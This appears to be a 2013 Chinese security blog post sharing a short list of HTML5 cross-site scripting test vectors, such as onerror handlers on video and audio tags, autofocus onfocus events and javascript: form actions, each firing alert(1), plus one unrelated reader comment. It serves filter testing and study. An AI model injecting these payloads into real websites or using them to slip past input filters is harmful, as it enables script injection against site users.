首页 > 渗透测试 > HTML5下的XSS测试代码
2013
07-10

HTML5下的XSS测试代码

国外某童鞋收集整理的针对HTML5的

XSS测试代码

<video> <source onerror=”javascript:alert(1)”>

引入媒体类测试代码Example:
<video onerror=”javascript:alert(1)”><source>
<audio onerror=”javascript:alert(1)”><source>

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>

表单点击测试代码Example:
<button form=test onformchange=alert(2)>X
<form><button formaction=”javascript:alert(1)”>

更多HTML5 安全请访问http://html5sec.org

HTML5下的XSS测试代码 - 第1张  | 阿德马Web安全

最后编辑:
作者:admin
这个作者貌似有点懒,什么都没有留下。

HTML5下的XSS测试代码》有 1 条评论

  1. shine 说:

    WORDPRESS订阅处要修改。订阅不了你的博客

留下一个回复

你的email不会被公开。